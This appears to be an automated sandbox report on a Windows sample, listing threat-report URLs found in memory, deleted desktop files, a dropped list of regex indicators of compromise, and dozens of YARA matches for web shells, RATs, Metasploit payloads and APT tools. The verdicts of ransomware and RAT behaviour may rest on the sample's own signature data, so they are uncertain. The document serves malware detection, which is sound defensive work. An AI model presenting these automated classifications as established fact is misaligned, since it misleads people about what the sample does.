Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/8P
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/ATMii:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/Windigo
Source: vnwareupdate.exe, 00000003.00000003.237953574.0000000003A27000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/04/eset-takes-part-global-operation-disru
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/04/eset-takes-part-global-operation-disruDisrupting
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/04/eset-takes-part-global-operation-disruFancy
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfi
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfi-
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfi2ed97283c6e157eb5;AP
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfiIStrongPity2
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfiStrongPity2
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfibStrongPity2
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2018/10/17/greyenergy-updated-arsenal-dangerous-threat-actors/
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/0F246A13178841F8B324CA54696F592B;Wa
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/APT
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/C20980D3971923A0795662420063528A43D
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/Turla
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdfAided
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdfIndustroyer
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdfIranian
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf.
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdf.P
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdfLeakerLocker:
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/07/Stantinko.pdfStantinko
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdfGazing
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdfNetwire
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pd
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdDiplomats
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdNearly
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdSkygofree:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdp
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://www.wired.com/images_blogs/threatlevel/2010/10/w32_stuxnet_dossier.pdf
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.wired.com/images_blogs/threatlevel/2010/10/w32_stuxnet_dossier.pdf8
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: https://www.wired.com/images_blogs/threatlevel/2010/10/w32_stuxnet_dossier.pdfPeering
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.wired.com/images_blogs/threatlevel/2010/10/w32_stuxnet_dossier.pdfStuxnet
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://www.yumpu.com/en/document/view/55505308/the-history-of-the-darkseoul-gro
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.zdnet.com/article/zero-day-in-popular-jquery-plugin-actively-exploited-for-at-least-thre
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://www.zingbox.com/blog/ploutus-d-malware-turns-atms-into-iot-devices/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategicWatering
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237233008.00000000036C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/blogs/research/ispy-keyloggerfFidelis
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/blogs/research/neutrino-malvertising-campaign-drops-gamaIThe
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/blogs/research/neutrino-malvertising-campaign-drops-gamalRetefe
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/blogs/research/new-infostealer-trojan-uses-fiddler-proxyTWO
Source: vnwareupdate.exe, 00000003.00000003.234063890.0000000005AD1000.00000004.00000001.sdmp	String found in binary or memory: https://www.zscaler.com/pdf/technicalbriefs/tb_advanced_persistent_threats.pdf
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf8
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdfAPT30
Source: vnwareupdate.exe, 00000003.00000003.241919530.0000000005791000.00000004.00000001.sdmp	String found in binary or memory: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdfHiding
Source: vnwareupdate.exe, 00000003.00000003.237137501.0000000002B8E000.00000004.00000001.sdmp	String found in binary or memory: https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdfTofsee
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://zairon.wordpress.com/2017/02/05/from-rtf-to-cobalt-strike-passing-via-fl
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://zairon.wordpress.com/2017/02/05/from-rtf-to-cobalt-strike-passing-via-flFrom

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

Code function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405205

E-Banking Fraud:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vnwareupdate.exe PID: 2540, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Modifies existing user documents (likely ransomware behavior)

Show sources

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File deleted: C:\Users\user\Desktop\SQSJKEBWDT.docx	Jump to behavior
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File deleted: C:\Users\user\Desktop\BNAGMGSPLO\EEGWXUHVUG.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File deleted: C:\Users\user\Desktop\ZGGKNSUKOP.jpg	Jump to behavior
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File deleted: C:\Users\user\Desktop\PIVFAGEAAV.docx	Jump to behavior
Source: C:\Users\user\Desktop\GZe6EcSTpO.exe	File deleted: C:\Users\user\Desktop\EEGWXUHVUG.xlsx	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Show sources

Source: C:\Users\user\Desktop\GZe6EcSTpO.exe

File dropped: C:\Users\user\Desktop\filename-iocs.txt -> decrypt\.url;60# hawkeye keylogger https://goo.gl/th5q2v\\hawkeye_keylogger_;70# kaspersky rat report https://goo.gl/th5q2v\\appdata\\roaming\\microsoft\\[^\\]{1,32}\.(exe|doc|zip);50\\audioendpointbuilder\.exe;60\\brokerinfrastructure\.exe;60\\windowsupdate\.exe;50# apt28 https://goo.gl/6xiayqmicrosoft\\mediaplayer\\updatewindws\.exe;100\\updatewindws\.exe;70\\netui\.dll;50\\edg6ef885e2\.tmp;60\\appdata\\local\\conhost\.dll;70\\application data\\conhost\.dll;70\\application data\\svchost\.exe;70\\application data\\conhost\.dll;70\\appdata\\local\\svchost\.exe;70\\appdata\\local\\conhost\.dll;70# fidelis threat advisory http://goo.gl/zjjyti\\9i86vdi3l1zi1v\\;60\\cvaniocol\.cmd;60\\flrsqgyy\.dvz;60\\ibdyambl\.vbs;60\\ouhlolswfixh$;60\\slie\.rjd$;60\\znimialt\.exe;60(temp|tmp|temp)\\cedt370r$3$\.exe;60(temp|tmp|temp)\\penguin\.exe;60\\microsoft\\windows\\hknswc\.exe;60\\microsoft\\windows\\appmgnt\.exe;60\\policymanager$;60\\file_127\.127\.ppt;60\\file_127\.127\.ppsx;60(t

Jump to dropped file

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.323793714.00000000050C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.436058475.0000000006B94000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file b37.php Author: Florian Roth
Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.445137935.0000000006BFE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt Author: Florian Roth
Source: 00000013.00000003.416791801.00000000051F5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0000000A.00000003.316101546.000000000684D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file shankar.php.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 0000000A.00000003.323779225.0000000006626000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 00000013.00000003.464557374.0000000006D87000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file h6ss.php Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects NoPowerShell hack tool Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects JQuery File Upload vulnerability CVE-2018-9206 Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects strings from FIN7 report in August 2018 Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious Doc from FIN7 campaign Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Dsniff hack tool Author: Florian Roth
Source: 00000013.00000003.416430149.0000000000884000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects NoPowerShell hack tool Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects JQuery File Upload vulnerability CVE-2018-9206 Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects strings from FIN7 report in August 2018 Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malicious Doc from FIN7 campaign Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs a tool used in the Australian Parliament House network compromise Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects APT34 PowerShell malware Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Crypto Miner strings Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Dsniff hack tool Author: Florian Roth
Source: 0000000A.00000003.305047164.0000000003324000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HOPLIGHT malware used by HiddenCobra APT group Author: Florian Roth
Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 0000000A.00000003.324801435.0000000006627000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php Author: Florian Roth
Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.308810849.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php Author: Florian Roth
Source: 0000000A.00000003.310723677.00000000050AA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - file h6ss.php Author: Florian Roth
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Web Shell - from files Shell [ci Author: unknown
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.sh Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.asp Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-psh.vba Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-exe.vba Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.psh Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.aspx Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-exe.aspx Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.vbs Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.vba Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-cmd.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.hta Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects PowerShell ISESteroids obfuscation Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Reflective DLL Loader Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBScript cloaked as Favicon file used in Leviathan incident Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from StoneDrill threat report Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from StoneDrill threat report Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects a ZxShell - CN threat group Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects EternalRocks Malware - file taskhost.exe Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects BeyondExec Remote Access Tool - file rexesvr.exe Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy RAT Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects strings from OilRig malware and malicious scripts Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related custom port scaner output file Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Industroyer related malware Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Red Sails Hacktool - Python Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects malware from Rehashed RAT incident Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Malware sample mentioned in Microcin technical report by Kaspersky Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Fireball malware - file clearlog.dll Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects CactusTorch Hacktool Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects Quasar RAT Author: Florian Roth
